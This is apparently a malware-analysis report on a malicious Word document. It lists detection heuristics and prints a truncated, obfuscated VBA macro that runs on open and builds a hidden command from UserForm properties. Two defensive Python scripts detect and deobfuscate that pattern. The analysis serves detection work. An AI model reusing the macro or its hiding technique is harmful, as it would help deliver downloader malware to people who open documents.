Verdict: MALICIOUS (Risk Score 302)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample contains heavily obfuscated VBA macros, including a hidden UserForm, which are designed to execute automatically upon opening the document. The heuristics indicate this is a command stager that likely downloads and executes a second-stage payload. ClamAV detection further supports its malicious nature as a downloader.
Heuristics (8)

- ClamAV: Doc.Downloader.Generic-7458497-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-7458497-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open auto-exec macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI found in ordinary Office files, not a download location; the second-stage URL is not visible in the extracted source.
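The stager heuristic above combines four pieces of evidence: an auto-exec entry point, a CreateObject/GetObject whose argument is a variable rather than a literal ProgID, Split/Join reassembly, and reads of hidden UserForm properties. The following Python triage script is an added example, not the analyzer's own detector or the sample's code; it runs that logic over two constructed VBA fragments (a stager-shaped one and a benign one that uses a literal ProgID with no auto-exec) so the difference between a noisy CreateObject call and the decoded-variable shape is visible. Control, variable and ProgID names in the fragments are invented for illustration.

```python
import re
from typing import Dict, List

# Constructed VBA fragment with the shape the OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
# heuristic describes. Not the sample's code: no real ProgID or command appears here.
STAGER_VBA = r'''
Private Sub Document_Open()
    Dim cls, cmd, o
    cls = Join(Split(Frm1.Tag, "|"), "")
    cmd = Frm1.Label1.ControlTipText + Frm1.MultiPage1.Pages(0).Caption
    Set o = CreateObject(cls)
    o.Run cmd, 0
End Sub
'''

# Constructed benign macro: literal ProgID, no auto-exec entry point, no form-property decoding.
BENIGN_VBA = r'''
Sub ExportNotes()
    Dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")
    fso.CreateTextFile("notes.txt").WriteLine ActiveDocument.Name
End Sub
'''

AUTOEXEC = {"autoopen", "auto_open", "document_open", "workbook_open",
            "autoexec", "auto_close", "document_close", "workbook_activate"}
RE_SUB = re.compile(r'^\s*(?:Private\s+|Public\s+)?Sub\s+([A-Za-z_]\w*)', re.I | re.M)
RE_OBJ = re.compile(r'\b(CreateObject|GetObject)\s*\(\s*([^)]+?)\s*\)', re.I)
RE_ASSIGN = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$', re.I | re.M)
RE_SPLITJOIN = re.compile(r'\bJoin\s*\(\s*Split\s*\(', re.I)
RE_FORMPROP = re.compile(r'\.(ControlTipText|Tag|Pages|HelpContextId)\b', re.I)


def analyse(vba: str) -> Dict[str, object]:
    """Collect the evidence the stager heuristic needs and combine it into a verdict."""
    # last assignment to a name wins; good enough for single-pass triage of macro source
    assigns = {name.lower(): rhs for name, rhs in RE_ASSIGN.findall(vba)}
    autoexec = [n for n in RE_SUB.findall(vba) if n.lower() in AUTOEXEC]

    decoded_objects: List[str] = []
    for func, arg in RE_OBJ.findall(vba):
        if arg.startswith('"'):
            continue  # literal ProgID: common in benign macros, not the decoded-variable shape
        rhs = assigns.get(arg.lower(), "")
        # the variable must have been built from Split/Join or a hidden form property
        if RE_SPLITJOIN.search(rhs) or RE_FORMPROP.search(rhs):
            decoded_objects.append(f"{func}({arg})")

    props = sorted({p.lower() for p in RE_FORMPROP.findall(vba)})
    split_join = RE_SPLITJOIN.search(vba) is not None
    stager = bool(autoexec) and bool(decoded_objects) and (split_join or bool(props))
    return {"autoexec": autoexec, "decoded_objects": decoded_objects,
            "form_props": props, "split_join": split_join, "stager": stager}


if __name__ == "__main__":
    for label, src in (("stager", STAGER_VBA), ("benign", BENIGN_VBA)):
        print(label, analyse(src))
```

The verdict deliberately requires all of the auto-exec entry point, a decoded object argument and a reassembly channel; a CreateObject call on its own (the OLE_VBA_CREATEOBJ finding) stays a supporting signal rather than a detection.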
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8116 bytes | b09c06f84adc830d046000b1676bee87f6548ae37c306caa6f9de690f60a9594 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Xbfyggbstkga"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Wauxlzlc, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Luznhagujg
Dim Rfycnzjafv
For Smwinhpyipi = Bhtzmdsez To 0
Vjigffzyym = xPI
Liadthpqju = CDbl(3)
Yhcqbabxi = Tan(MyeW5A)
Qbuaqfruafvb = 4 - Uoisadandhy
Wxktevpkc = (3 - Zkrauzdfd)
Msehmscxm = Xvwplqgjes
Spmatees = CDbl(6)
Plspxjxhf = Tan(Mnvefomy)
Next
Dim Yytwjyvix
Dim Kdjofrql
For Zgmdbcvqam = Bhtzmdsez To 0
Pesvmxgzovyn = xPI
Qkxonoduyrhs = CDbl(3)
Arxdrrnfwjftf = Tan(MyeW5A)
Diyigmkslytpu = 4 - Otojzwyv
Hkoniuje = (3 - Jijbkqzleybs)
Vlevaaemcezbw = Dkkxkqfj
Ixnqxbolsswpn = CDbl(6)
Qwfecituianrv = Tan(Pbswrdrwf)
Next
Dim Klslsejbzaz
Dim Ksmxqqtrjdhk
For Trqmwmbw = Bhtzmdsez To 0
Kbvtpxxukhh = xPI
Fmwexahlao = CDbl(3)
Jincftokwmo = Tan(MyeW5A)
Blgmawvmelaai = 4 - Aeknudfojseo
Psyaewpbzzrfd = (3 - Nbwptkscabwww)
Wicqosbadhgz = Voaarwrhyz
Pxziasefdjcmq = CDbl(6)
Ashnlnremv = Tan(Acojdfrde)
Next
Smykpfwt
End Sub
Attribute VB_Name = "Oqumvzjp"
Attribute VB_Base = "0{7C177D75-0098-48AF-8580-0D1375B79E0E}{95A7C57D-8104-4632-958D-2EBE40DFBDBD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Azqrtcoqmf"
Function Wwrkgqfdymayp()
Dim Qvvkowza
Dim Foyahmvhaevm
For Dckgafceeg = Bhtzmdsez To 0
Gfdumjevuxh = xPI
Cvhhdgdekh = CDbl(3)
Talpbjsfsf = Tan(MyeW5A)
Frmhwqgur = 4 - Kuxazrlwyqiti
Tnontwfcb = (3 - Whtbruzbbuej)
Hjroxydoqxs = Acesvoev
Wznthrlp = CDbl(6)
Zlmooenrhqwi = Tan(Zzxciuosegu)
Next
Opqppdwpfvcl = Xbfyggbstkga.Wauxlzlc
Dim Tnkiynjopecq
Dim Zgxhjpmpwo
For Kwubjcpioncco = Bhtzmdsez To 0
Mpzuqfkdpv = xPI
Ledqwezdnuov = CDbl(3)
Wylevsvd = Tan(MyeW5A)
Wtouasegziedk = 4 - Ypkysbeup
Slaryheduc = (3 - Cvphvrwsn)
Wdkfhyszzlnzt = Kwzgcdikhc
Jctqzemdnncw = CDbl(6)
Dqtpvvbm = Tan(Sglvoscceeiwf)
Next
Jlwltcrxb = Opqppdwpfvcl + Oqumvzjp.Uieffhcfse + Oqumvzjp.Wippwwxuo + Oqumvzjp.Kkwblgmjvpege
Dim Bezxkryjfebcq
Dim Pdtfpvpisvwg
For Qmbngqngvhp = Bhtzmdsez To 0
Cjhsbjkor = xPI
Qelwhcok = CDbl(3)
Psapjtdjhlqc = Tan(MyeW5A)
Ylcuwacyrzw = 4 - Rzsteynnr
Sqgfkikn = (3 - Xwaunoqqabsgo)
Osmecahezc = Woiojoftdsyq
Wqejlctvvqyil = CDbl(6)
Rarhuucsmjs = Tan(Gwtvugdqzprd)
Next
Ebtpnkgh = Jlwltcrxb + Oqumvzjp.Uefnidjhjk + Oqumvzjp.Iraetijoqp
Dim Uujpjalhkv
Dim Tiodjvronaxf
For Vytlxtsrra = Bhtzmdsez To 0
Dwbvjmekcawvm = xPI
Dvtwegzfno = CDbl(3)
Iabrnrlsunsrl = Tan(MyeW5A)
Gvbyzahovxdhq = 4 - Ngkovkajidae
Dclcitjlqzx = (3 - Gtjjvodzlg)
Ngmsuzwqy = Sfhkicqlruxu
Ufporrvowvmxt = CDbl(6)
Alnoxrenevxvu = Tan(Pmwtaugbhb)
Next
Wwrkgqfdymayp = Iodadywfwqg + Ebtpnkgh + Iodadywfwqg
Dim Ujzuwnkdyath
Dim Ztjagbbrbbnj
For Kqzhkgynhcn = Bhtzmdsez To 0
Cyzklvyuxvi = xPI
Qdhxhmutshal = CDbl(3)
Vmlgnlmztcrb = Tan(MyeW5A)
Xnvrhrpvfjva = 4 - Kryypdchmouoh
Egfyzwflie = (3 - Agclnlqp)
Smktpahx = Xladqbazeg
Jabbkdhcrcia = CDbl(6)
Oggedlkvfofz = Tan(Kqkuoyckrn)
Next
... (truncated)
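Most of the preview above is filler: every `For X = Bhtzmdsez To 0` loop iterates over an uninitialised Variant (Empty coerces to 0, so the loop runs once) and its body only assigns names that are never read again, and the `Dim` statements declare variables that are never used. The real work is the handful of lines that read the TextBox control `Wauxlzlc` on `Xbfyggbstkga` and concatenate properties of the `Oqumvzjp` UserForm. The script below is an added example, not part of the report or the analyzer, that strips that filler mechanically: it drops a loop when every body line assigns a write-only name, drops unused `Dim` lines, and keeps only the `VB_Control` attribute (it names the hidden control the code reads). The input is a trimmed copy of the page's own preview with a closing `End Function` added, since the listing is truncated.

```python
import re
from collections import Counter
from typing import List

# Constructed input: a trimmed copy of the page's macro preview (junk loops shortened,
# End Function added because the listing is truncated). Not the full extracted macros.bas.
SAMPLE_VBA = '''\
Attribute VB_Name = "Xbfyggbstkga"
Attribute VB_Control = "Wauxlzlc, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Luznhagujg
Dim Rfycnzjafv
For Smwinhpyipi = Bhtzmdsez To 0
Vjigffzyym = xPI
Liadthpqju = CDbl(3)
Yhcqbabxi = Tan(MyeW5A)
Next
Smykpfwt
End Sub
Attribute VB_Name = "Azqrtcoqmf"
Function Wwrkgqfdymayp()
Dim Qvvkowza
For Dckgafceeg = Bhtzmdsez To 0
Gfdumjevuxh = xPI
Cvhhdgdekh = CDbl(3)
Next
Opqppdwpfvcl = Xbfyggbstkga.Wauxlzlc
For Kwubjcpioncco = Bhtzmdsez To 0
Mpzuqfkdpv = xPI
Ledqwezdnuov = CDbl(3)
Next
Jlwltcrxb = Opqppdwpfvcl + Oqumvzjp.Uieffhcfse + Oqumvzjp.Wippwwxuo + Oqumvzjp.Kkwblgmjvpege
Ebtpnkgh = Jlwltcrxb + Oqumvzjp.Uefnidjhjk + Oqumvzjp.Iraetijoqp
Wwrkgqfdymayp = Iodadywfwqg + Ebtpnkgh + Iodadywfwqg
End Function
'''

RE_FOR = re.compile(r'^\s*For\s+\w+\s*=\s*\w+\s+To\s+0\s*$', re.I)   # the filler-loop shape
RE_NEXT = re.compile(r'^\s*Next\b', re.I)
RE_DIM = re.compile(r'^\s*Dim\s+([A-Za-z_]\w*)\s*$', re.I)
RE_ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*.+$')
RE_IDENT = re.compile(r'[A-Za-z_]\w*')


def identifier_counts(lines: List[str]) -> Counter:
    """How often each identifier occurs in code lines (VBA is case-insensitive)."""
    counts: Counter = Counter()
    for ln in lines:
        if not ln.lstrip().lower().startswith("attribute "):
            counts.update(s.lower() for s in RE_IDENT.findall(ln))
    return counts


def strip_junk(vba: str) -> List[str]:
    """Return the macro skeleton with write-only loops, unused Dims and attributes removed."""
    lines = vba.splitlines()
    counts = identifier_counts(lines)

    def write_only(ln: str) -> bool:
        # an assignment whose target is never mentioned anywhere else is filler
        m = RE_ASSIGN.match(ln)
        return bool(m) and counts[m.group(1).lower()] == 1

    out: List[str] = []
    i = 0
    while i < len(lines):
        ln = lines[i]
        low = ln.lstrip().lower()
        if RE_FOR.match(ln):
            j = i + 1
            while j < len(lines) and not RE_NEXT.match(lines[j]):
                j += 1
            body = lines[i + 1:j]
            if j < len(lines) and body and all(write_only(b) for b in body):
                i = j + 1          # whole loop is filler: drop For..Next
                continue
        elif (m := RE_DIM.match(ln)) and counts[m.group(1).lower()] == 1:
            i += 1                 # declared but never used
            continue
        elif low.startswith("attribute "):
            if low.startswith("attribute vb_control"):
                out.append(ln.rstrip())   # keep: names the hidden control the code reads
            i += 1
            continue
        if ln.strip():
            out.append(ln.rstrip())
        i += 1
    return out


if __name__ == "__main__":
    print("\n".join(strip_junk(SAMPLE_VBA)))
```

On the sample the result is ten lines: the auto-exec `Document_open` that calls `Smykpfwt`, and `Wwrkgqfdymayp`, which builds a string from the TextBox and the UserForm properties. The property values themselves live in the form stream, not in the VBA source, which is why the decoded command does not appear in the preview.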